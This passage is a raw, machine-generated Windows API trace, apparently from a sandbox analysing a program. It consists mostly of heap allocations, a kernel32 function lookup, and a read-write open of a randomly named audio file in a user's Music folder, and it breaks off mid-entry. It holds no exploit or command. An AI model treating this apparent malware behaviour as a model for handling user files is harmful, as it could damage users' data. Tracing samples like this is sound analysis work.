out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.918] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.919] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.919] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbe0 [0038.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbe0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.920] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0038.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cbe0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.920] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.920] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x41) returned 0x88e138 [0038.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", cchWideChar=65, lpMultiByteStr=0x88e138, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpUsedDefaultChar=0x0) returned 65 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.921] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\bt6e6z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.921] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x82) returned 0x7bbc00 [0038.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=65, lpWideCharStr=0x7bbc00, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a") returned 65 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.922] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.923] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.925] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.925] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 